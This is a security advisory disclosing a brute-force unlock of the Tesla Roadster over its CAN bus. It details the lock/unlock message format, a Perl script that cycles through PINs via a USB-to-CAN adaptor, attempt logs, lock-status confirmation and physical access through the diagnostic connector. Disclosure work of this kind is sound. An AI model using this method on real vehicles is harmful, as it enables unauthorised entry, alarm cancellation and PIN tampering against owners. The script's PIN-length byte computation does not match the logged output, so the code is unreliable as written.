Vulnerability Announcement: Tesla Roadster vulnerable to brute-force unlock via CAN bus

SUMMARY

The Tesla Roadster instrumentation CAN bus (running at 1MHz) supports a CAN bus message to lock/unlock the car as well as enable/disable valet mode. Authentication on this message is via simple user PIN code which is typically 4 digits (but can be up to 8 digits).

It appears that this is vulnerable to brute-force attack as there is no rate limiting on reception/interpretation of that message.

TECHNICAL DETAILS

The CAN bus message is:

ID: 0x102
B1: 0x0B
B2: 0x00 = Activate Valet mode
    0x01 = Deactivate Valet mode
    0x02 = Lock car
    0x03 = unlock car
B3: 0x00
B4: 0x00
B5: PIN LSB
B6: PIN
B7: PIN (total 28 bits for PIN)
B8: PIN MSB
    4 bits = number of PIN characters (1-8)
    4 LSB bits = PIN MSB

Note: Example PIN 1234 unlock is 0x0B, 0x03, 0x00, 0x00, 0xD2, 0X04, 0x00, 0x40
Note: Unlock/lock does not affect the immobilizer+alarm (fitted on vehicles outside North America)

An example script using a laptop and USB to CAN bus adaptor.

sub teslacrack
  {
  my ($fn, $pin) = @_;

  my $msg = sprintf 't10280b%02x0000%02x%02x%02x%02x',
  $fn,
  $pin & 0xff,
  ($pin>>8) & 0xff,
  ($pin>>16) & 0xff,
  (length($pin)>24) & 0x0f);

  print $canusb $msg,"\r";
  }

for (0 .. 9999)
  {
  &teslacrack(3,$pin++);
  }

Transmitting at 100 messages / second, I tested PINs 0000 through 9999 in 100 seconds. Average PIN discovery time was thus approximately 50 seconds at this rate.

1493791128.000 CXX TESLACRACK FN#3 PIN5142 => t10280b03000016140040
1493791128.000 CXX TESLACRACK FN#3 PIN5143 => t10280b03000017140040
1493791128.000 CXX TESLACRACK FN#3 PIN5144 => t10280b03000018140040
1493791128.000 CXX TESLACRACK FN#3 PIN5145 => t10280b03000019140040
1493791128.000 CXX TESLACRACK FN#3 PIN5146 => t10280b0300001a140040
1493791128.000 CXX TESLACRACK FN#3 PIN5147 => t10280b0300001b140040
1493791128.000 CXX TESLACRACK FN#3 PIN5148 => t10280b0300001c140040
1493791128.000 CXX TESLACRACK FN#3 PIN5149 => t10280b0300001d140040
1493791128.000 CXX TESLACRACK FN#3 PIN5150 => t10280b0300001e140040
1493791128.000 CXX TESLACRACK FN#3 PIN5151 => t10280b0300001f140040
1493791128.000 CXX TESLACRACK FN#3 PIN5152 => t10280b03000020140040
1493791128.000 CXX TESLACRACK FN#3 PIN5153 => t10280b03000021140040
1493791128.000 CXX TESLACRACK FN#3 PIN5154 => t10280b03000022140040
1493791128.000 CXX TESLACRACK FN#3 PIN5155 => t10280b03000023140040
1493791128.000 CXX TESLACRACK FN#3 PIN5156 => t10280b03000024140040
1493791128.000 CXX TESLACRACK FN#3 PIN5157 => t10280b03000025140040
1493791128.000 CXX TESLACRACK FN#3 PIN5158 => t10280b03000026140040
1493791128.000 CXX TESLACRACK FN#3 PIN5159 => t10280b03000027140040
1493791128.000 CXX TESLACRACK FN#3 PIN5160 => t10280b03000028140040
1493791128.000 CXX TESLACRACK FN#3 PIN5161 => t10280b03000029140040
1493791128.000 CXX TESLACRACK FN#3 PIN5162 => t10280b0300002a140040

The CAN-USB adaptor I used was limited to approximately 100 messages / second. A faster adaptor could seemingly brute force this with greater speed.

Although not used for this brute force test, a CAN bus message is sent from the VMS to indicate the lock status. This is ID 0x100 B1=0x96. This message can be used to programatically verify that the PIN code tested was correct.

IMPACT

The instrumentation CAN bus is available at various points in the car, with the simplest being the engineering diagnostic connector in the passenger footwell of the vehicle.

The PIN code permits the following functions:

1. Enable valet mode
2. Disable valet mode
3. Lock the vehicle
4. Unlock the vehicle
5. Cancel the alarm (via unlocking the vehicle) in North American vehicles
6. Change the PIN code

On vehicles outside North America, a separate alarm system and immobiliser is used. That system is not affected by this PIN code, so functions 4 through 5 will have limited impact on these vehicles.

There is a separate physical key used to start the vehicle, and unlock the steering wheel, that is not affected by this vulnerability.

Overall, it seems that the greatest concerns for this brute force attack would be:

• Cancelling a sounding alarm on North American vehicles
• Providing access to the trunk and glove compartment of a locked vehicle
• Malicious prank to enable valet mode
• Malicious prank to change the PIN code (possibly after enabling valet mode)

MITIGATION

While the default PIN code provided with the vehicle is 4 digits, the system does seems to accept longer PIN codes. Use of longer PIN codes would increase the time taken to successfully brute force the code.

Reported: 3 May 2017
Classification: Sensitive Data Exposure > Critically Sensitive Data > Password Disclosure
Vendor Response: Declined to address, and no fix for more than 1 year, so public release
Public Release: 3 Dec 2018